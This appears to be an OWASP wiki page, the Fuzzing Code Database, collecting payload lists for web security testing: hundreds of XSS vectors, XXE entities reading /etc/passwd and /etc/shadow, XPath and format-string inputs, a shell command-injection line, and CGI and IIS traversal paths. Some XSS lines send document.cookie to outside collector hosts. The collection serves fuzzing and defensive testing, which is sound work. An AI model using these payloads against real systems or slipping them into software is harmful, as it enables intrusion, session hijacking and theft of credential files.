&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===<br />
<pre><br />
# Full List<br />
# Format String tests to determine errors in variable handling<br />
# Foobar@email.de<br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| leader_name = Wagner Elias<br />
| leader_username = Wagner.elias<br />
| mailing_list_name = owasp-fuzzing-code-database<br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=80302
Category:OWASP Fuzzing Code Database
2010-03-22T17:05:41Z
<p>Foobar23: /* XSS Statements - Most effective/most common statements */ Marked my contribution</p>
<hr />
<div>This database is a collection of several statements used in code injection, fuzzing and brute-force approaches. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injection Statements <br />
*67 new Directory Traversal Statements <br />
*Deleted 33 duplicate XSS Statements <br />
*30 new XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intends to create a database that brings together all tools that are based on wordlists, such as WebScarab, JBroFuzz, WebSlayer, DirBuster and others. In addition to the current tools developed by OWASP members, we will create a database in a style similar to the Open Vulnerability and Assessment Language (OVAL), where any tool can adopt and use an XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included in this project: <br />
<br />
1 - The statements of ASDR Project <br />
<br />
2 - Browser <br />
<br />
3 - Operating System <br />
<br />
4 - Databases <br />
<br />
A URL will also be published to create a collaborative environment for the maintenance process, where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if it is not valid yet and not maintained in another database. <br />
<br />
2 - A list where, besides the statement, a single ID will be maintained to identify each statement, with a description and the results of the exploitation. <br />
<br />
3 - The ability for users to report their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Microsoft URLs (18 March 2010) ===<br />
<pre># Interesting IIS Files & Directories (17 March, 2009)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely means the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404s for 403s. <br />
# Alternatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
index.shtml<br />
x.htw<br />
x.ida<br />
x.idq<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
